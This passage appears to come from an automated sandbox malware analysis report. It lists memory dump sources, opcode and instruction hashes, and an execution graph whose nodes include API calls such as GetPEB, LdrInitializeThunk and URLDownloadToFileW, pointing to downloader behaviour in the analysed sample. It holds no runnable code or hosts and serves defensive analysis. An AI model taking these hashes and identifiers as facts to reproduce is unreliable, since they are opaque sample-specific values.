                        • Instruction Fuzzy Hash: 75B0927008A2865BC34167200829AA36B552BA1210B6985AED0C00A14B87584675E7A2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        Memory Dump Source
                        • Source File: 00000006.00000002.566252424.0000000001380000.00000040.00000001.00020000.00000000.sdmp, Offset: 01380000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_1380000_zkqrKAufFycYKMdseGdhuYpyTVNu.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 791634668ed0db82ba60d2b2caeb12b8b239b92cb31d5dfc98e587fe531684f9
                        • Instruction ID: e6cd4b975672edc97eaad6a8d3891c608aeb046747e8cb31da1c1ec735a207a7
                        • Opcode Fuzzy Hash: 791634668ed0db82ba60d2b2caeb12b8b239b92cb31d5dfc98e587fe531684f9
                        • Instruction Fuzzy Hash: C5B092B008A2C18FC34263204C2ACA37B242EA222136A81EAD0C40B15A865C4939E7B2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Execution Graph

                        Execution Coverage:7%
                        Dynamic/Decrypted Code Coverage:2.7%
                        Signature Coverage:0%
                        Total number of Nodes:37
                        Total number of Limit Nodes:2
                        execution_graph
                        25419 3b8489c
                        25422 3b848d5
                        25419->25422
                        25421 3b848c6
                        25423 3b848ec
                        25422->25423
                        25424 3b848f7
                        25423->25424
                        25428 3b661e9
                        25423->25428
                        25424->25421
                        25429 3b661f8
                        25428->25429
                        25436 3b66202
                        25429->25436
                        25431 3b66200
                        25431->25424
                        25432 3b84963
                        25431->25432
                        25434 3b8496d
                        25432->25434
                        25447 3b6e06b
                        25434->25447
                        25435 3b849ee
                        25435->25424
                        25437 3b6622b
                        25436->25437
                        25442 3b85150
                        25437->25442
                        25439 3b6625d
                        25440 3b85150 GetPEB
                        25439->25440
                        25441 3b6626c
                        25440->25441
                        25441->25431
                        25443 3b8515d
                        25442->25443
                        25444 3b85161
                        25442->25444
                        25443->25439
                        25445 3b851a9 GetPEB
                        25444->25445
                        25446 3b851c3
                        25444->25446
                        25445->25446
                        25446->25439
                        25448 3b6e099
                        25447->25448
                        25451 3b6db20
                        25448->25451
                        25450 3b6e0a9
                        25450->25435
                        25452 3b6db36
                        25451->25452
                        25455 3b6e6a4
                        25452->25455
                        25454 3b6db41
                        25454->25450
                        25456 3b6e6b8
                        25455->25456
                        25458 3b6e720
                        25456->25458
                        25459 3b651f6
                        25456->25459
                        25458->25454
                        25460 3b651fe
                        25459->25460
                        25462 3b6522e
                        25459->25462
                        25461 3b65215 GetPEB
                        25460->25461
                        25460->25462
                        25461->25462
                        25462->25458
                        25465 4000f5a LdrInitializeThunk
                        25468 3b84004 URLDownloadToFileW
                        25469 3b84876 GetPEB GetPEB
                        APIs
                        Memory Dump Source
                        • Source File: 00000007.00000002.575307250.0000000004000000.00000040.00000001.00020000.00000000.sdmp, Offset: 04000000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_4000000_zkqrKAufFycYKMdseGdhuYpyTVNu.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 791634668ed0db82ba60d2b2caeb12b8b239b92cb31d5dfc98e587fe531684f9
                        • Instruction ID: e6cd4b975672edc97eaad6a8d3891c608aeb046747e8cb31da1c1ec735a207a7
                        • Opcode Fuzzy Hash: 791634668ed0db82ba60d2b2caeb12b8b239b92cb31d5dfc98e587fe531684f9
                        • Instruction Fuzzy Hash: C5B092B008A2C18FC34263204C2ACA37B242EA222136A81EAD0C40B15A865C4939E7B2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        Memory Dump Source
                        • Source File: 00000007.00000002.575307250.0000000004000000.00000040.00000001.00020000.00000000.sdmp, Offset: 04000000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_4000000_zkqrKAufFycYKMdseGdhuYpyTVNu.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: a6bdf01ca1c0c5a43ad605715ddbe7bd6d0429d503267bc2b4746c944573b98b
                        • Instruction ID: 13d8455f11edab5e26112e1f76ce15454a3e06d171b0115a56dfd79d7043cd27
                        • Opcode Fuzzy Hash: a6bdf01ca1c0c5a43ad605715ddbe7bd6d0429d503267bc2b4746c944573b98b
                        • Instruction Fuzzy Hash: 75B0927008A2865BC34167200829AA36B552BA1210B6985AED0C00A14B87584675E7A2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        Memory Dump Source
                        • Source File: 00000007.00000002.575307250.0000000004000000.00000040.00000001.00020000.00000000.sdmp, Offset: 04000000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_4000000_zkqrKAufFycYKMdseGdhuYpyTVNu.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 6443a9b9c20338df526d967f01ba007e1c2c7c349fe7d139e25d763d52dc77a8
                        • Instruction ID: 6e447e2aab31238f52af9227f51ec9419e211fef2ea0690e6f86d454c0306d03
                        • Opcode Fuzzy Hash: 6443a9b9c20338df526d967f01ba007e1c2c7c349fe7d139e25d763d52dc77a8
                        • Instruction Fuzzy Hash: 70B0927008A2825BC342672009388A2BB142BA231176DC0EAD0C00A14A8A584665F3A2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        Memory Dump Source
                        • Source File: 00000007.00000002.575307250.0000000004000000.00000040.00000001.00020000.00000000.sdmp, Offset: 04000000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_4000000_zkqrKAufFycYKMdseGdhuYpyTVNu.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: dcb7c3af475a23df02debab6b573447acc9632e9873d927ffe8e15c59b0c6522
                        • Instruction ID: 276e05382c44e754f64a631682c2cf0a86faafde1a6fa7e7aeff9baa436309a7
                        • Opcode Fuzzy Hash: dcb7c3af475a23df02debab6b573447acc9632e9873d927ffe8e15c59b0c6522
                        • Instruction Fuzzy Hash: 1BB0927008A2D14BC342A3204828AA77B542BA2211B69C0EAD0C02A14A86584625E3A3
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        Memory Dump Source
                        • Source File: 00000007.00000002.575307250.0000000004000000.00000040.00000001.00020000.00000000.sdmp, Offset: 04000000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_4000000_zkqrKAufFycYKMdseGdhuYpyTVNu.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: d09c6d336daddccd9ad0fb98a292e4fd4d6995d8b64d3c54430dff6c08c5ba09
                        • Instruction ID: 88293d452c237b35b5d788c3fe7e5d6bf4017d7a5827ca68aa0277ca53bbf94f
                        • Opcode Fuzzy Hash: d09c6d336daddccd9ad0fb98a292e4fd4d6995d8b64d3c54430dff6c08c5ba09
                        • Instruction Fuzzy Hash: 04B0927008A2C24BC30157200C28AA77B542BA1312B6981AED0C00A55A87684561E7B2
                        Uniqueness

                        Uniqueness Score: -1.00%